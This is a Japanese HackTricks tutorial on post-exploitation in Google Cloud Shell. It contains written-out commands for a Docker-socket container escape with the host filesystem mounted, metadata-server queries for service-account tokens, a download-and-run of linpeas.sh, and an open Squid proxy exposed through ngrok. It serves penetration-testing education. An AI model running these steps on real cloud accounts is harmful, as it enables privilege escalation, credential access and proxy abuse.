GCP - Cloud Shell Post Exploitation

htARTE(HackTricks AWS Red Team Expert) でAWSハッキングをゼロからヒーローまで学ぶ

HackTricksをサポートする他の方法:

Cloud Shell

Cloud Shellに関する詳細情報は次をチェックしてください:

pageGCP - Cloud Shell Enum

コンテナの脱出

Google Cloud Shellはコンテナ内で実行されていることに注意し、次のようにして簡単にホストに脱出できます:

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh

これはGoogleによって脆弱性とは見なされていませんが、その環境で何が起こっているのかをより広い視野で把握できます。

さらに、ホストからサービスアカウントトークンを見つけることができることに注意してください:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/

以下のスコープで:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"

https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write

LinPEASを使用してメタデータを列挙します:

cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud

https://github.com/carlospolop/bf_my_gcp_permissionsをService Accountのトークンで使用した後、権限が見つかりませんでした...

プロキシとして使用する

Google Cloud Shellインスタンスをプロキシとして使用したい場合は、次のコマンドを実行する必要があります(またはこれらを.bashrcファイルに挿入します):

sudo apt install -y squid

Squidはhttpプロキシサーバーです。次の設定を持つsquid.confファイルを作成してください:

http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all

squid.confファイルを**/etc/squid**にコピーします。

sudo cp squid.conf /etc/squid

最後に、Squidサービスを実行します:

sudo service squid start
外部からプロキシを利用できるようにするために、ngrokを使用します:
./ngrok tcp 3128

起動後に、tcp:// URL をコピーします。ブラウザからプロキシを実行する場合は、tcp:// 部分とポートを削除し、ポートをブラウザのプロキシ設定のポートフィールドに入力することが推奨されます(squid は http プロキシサーバーです)。

起動時の利便性のために、.bashrc ファイルには以下の行があるべきです:

sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok;./ngrok tcp 3128

指示はhttps://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-keyからコピーされました。他のクレイジーなアイデアを実行する方法(データベースやWindowsさえも)については、そのページをチェックしてください。

htARTE(HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ こちら!

HackTricksをサポートする他の方法:

最終更新